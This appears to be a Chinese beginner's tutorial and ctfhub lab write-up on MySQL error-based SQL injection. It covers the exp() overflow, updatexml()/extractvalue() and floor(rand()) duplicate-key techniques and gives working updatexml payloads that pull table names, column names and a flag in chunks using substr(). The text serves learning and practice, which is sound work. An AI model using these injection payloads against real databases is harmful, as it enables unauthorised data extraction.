1、对报错注入的理解
报错注入就是通过一些函数的错误使用后从报错的内容中获取信息,就是在可以进行sql注入的位置,调用特殊的函数执行,利用函数报错使其输出错误结果来获取数据库的相关信息。
当注入点不回显数据库查询的数据,那么通过一般的注入手段是无法返回相关数据库的信息,但是,如果查询时输入错误SQL代码会报错,并且是通过mysql_error(),mysqli_error()等返回错误,那么就存在报错注入的可能性。
2、报错注入的种类
(1).BigInt数据类型溢出
exp(int)函数返回e的x次方,当x的值足够大的时候就会导致函数的结果数据类型溢出,也就会因此报错:"DOUBLE value is out of range"
exp 函数返回浮点参数的指数值,如果成功,则为 x 。 也就是说,结果是 e x ,其中 e 是自然对数的底。 在溢出时,该函数返回 INF (无限),在下溢时, exp 返回 0。
(2).函数参数格式错误
两个重要函数:updatexml() extractvalue ()
需要构造Xpath_string格式错误,也就是将Xpath_string的值传递成不符合格式的参数,mysql就会报错
updatexml()函数语法:updatexml(XML_document,Xpath_string,new_value)
XML_document: 字符串String格式,为XML文档对象名称
Xpath_string: Xpath格式的字符串
new_value: string格式,替换查找到的符合条件的数据
(3)主键冲突(重复)
利用 select count(*),(floor(rand(0)*2)) x from users group by x
这个相对固定的语句格式,导致的数据库报错
主键重复方式的报错注入利用的函数有: floor() + rand() + group() + count()
rand()是一个随机函数,通过一个固定的随机数的种子0之后,产生大于等于0小于1的伪随机序列
floor() 函数的作用就是返回小于等于括号内该值的最大整数,也就是取整。
报错原因分析:
select count(*),(floor(rand(0)*2)) x from users group by x
3、执行流程:
(1)用户输入参数(用户id)
(2)后台执行SQL(查询用户信息)
(3)查询结果在前端回显
注:version():返回数据库版本
concat():拼接特殊符号和查询结果
4.长度限制
updatexml() 函数的报错内容长度不能超过32个字符,常用的解决方式有两种:
- limit 分页
- substr()截取字符
以ctfhub-报错注入 为例
使用floor() 1.查询表名
查询错误: Subquery returns more than 1 row
2.这个报错说明该数据库下有多个表,需要用limit依次查找
查询错误: Duplicate entry 'flag1' for key 'group_key'
第二个表flag存有flag,这里拼接了一个1作为查询语句,因此要忽略
3.查询列名 1 and updatexml (1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='flag'),0x7e),1) #
查询错误: Duplicate entry 'flag1' for key 'group_key'
第二个表flag的列flag存有flag
4.变值 1 and updatexml(1,concat(0x7e,(select flag from flag),0x7e),1) #
这里发现回显不完整,需要获取该数据的长度。 1 and updatexml(1,concat(0x7e,(select length(flag) from flag),0x7e),1) #
可以发现该数据一共有32 位。
注: length() --- 常用于获取字符串的长度,用于验证字符串的有效性,计算字符个数以及进行字符串比较等操作。
substr(string,start,length)
string --- 提取字符串的源字符串。
start --- 子字符串的起始位置,它可以是一个正整数或负整数。对于正整数,表示从左向右的偏移量,其中第一个字符的位置为1;对于负整数,表示从右向左的偏移量,其中最后一个字符的位置为-1。
length --- 提取的子字符串的长度,是一个可选参数。如果指定了长度,将从起始位置开始提取指定长度的子字符串;如果未指定长度,则将提取从起始位置到字符串末尾的所有字符。 因为无法一次性将数据全部回显,所以需要截取位数,分步获取。 1 and updatexml(1,concat(0x7e,(select substr(flag,1,16) from flag),0x7e),1) #
1 and updatexml(1,concat(0x7e,(select substr(flag,17,32) from flag),0x7e),1) #
需要将两次的数据拼凑在一起,就是整个flag 的内容。
小白入门,请大家多多指教!